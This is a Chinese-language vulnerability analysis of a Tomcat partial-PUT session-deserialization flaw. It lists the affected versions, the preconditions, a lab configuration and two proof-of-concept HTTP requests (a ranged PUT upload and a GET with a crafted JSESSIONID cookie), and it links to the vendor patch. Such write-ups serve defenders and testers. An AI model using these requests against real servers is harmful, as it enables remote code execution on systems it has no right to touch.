漏洞概况

Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。它由 Apache 软件基金会下的 Jakarta 项目开发，是目前最流行的 Java Web 服务器之一。
该漏洞利用条件较为复杂，需同时满足以下四个条件：

1. 应用程序启用了DefaultServlet写入功能，该功能默认关闭
2. 应用支持了 partial PUT 请求，能够将恶意的序列化数据写入到会话文件中，该功能默认开启
3. 应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置，需要额外配置
4. 应用中包含一个存在反序列化漏洞的库，比如存在于类路径下的 commons-collections，此条件取决于业务实现是否依赖存在反序列化利用链的库

漏洞影响范围

• 9.0.0.M1 <= tomcat <= 9.0.98
• 10.1.0-M1 <= tomcat <= 10.1.34
• 11.0.0-M1 <= tomcat <= 11.0.2

漏洞原理分析

Content-Range 在 Tomcat 的HTTP PUT请求中主要用于实现大文件的分块传输。在文件上传未完成的情况下，内容会被临时存储在Tomcat的工作目录：$CATALINA_BASE/work/Catalina/localhost/ROOT。

该漏洞的核心在于不完整PUT请求上传时的文件名处理机制：文件路径中的分隔符/会被转换为.。例如：访问/xxxxx/session会被解析为.xxxxx.session

因此整个漏洞的利用过程为：

1. Tomcat的File会话存储默认路径同样位于：CATALINA_BASE/work/Catalina/localhost/ROOT​
2. 当存在反序列化利用链时，可以上传包含恶意序列化数据的文件
3. 通过设置JSESSIONID=.xxxxx来触发漏洞

环境配置

在conf/context.xml中，添加如下配置，开启File文件会话存储

<Context\>  
<Manager className\="org.apache.catalina.session.PersistentManager"\>  
    <Store className\="org.apache.catalina.session.FileStore"/>  
</Manager\>  
</Context\>

在conf/web.xml中，将DefaultServlet的readonly配置为false，启用写入功能

<servlet\>  
    <servlet-name\>default</servlet-name\>  
    <servlet-class\>org.apache.catalina.servlets.DefaultServlet</servlet-class\>  
    <init-param\>  
        <param-name\>debug</param-name\>  
        <param-value\>0</param-value\>  
    </init-param\>  
    <init-param\>  
        <param-name\>readonly</param-name\>  
        <param-value\>false</param-value\>  
    </init-param\>  
    <load-on-startup\>1</load-on-startup\>  
</servlet\>

将Commons Collections 3.2.1.jar放入lib文件夹

漏洞复现

生成一个恶意的序列化文件，使用以下数据包上传，需要注意Range的分块值需要与Length保持一致，且大于当前文件的长度。

PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}

使用以下PoC触发

GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx

修复方案

Apache基金会官方已发布漏洞公告，可下载补丁更新：https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq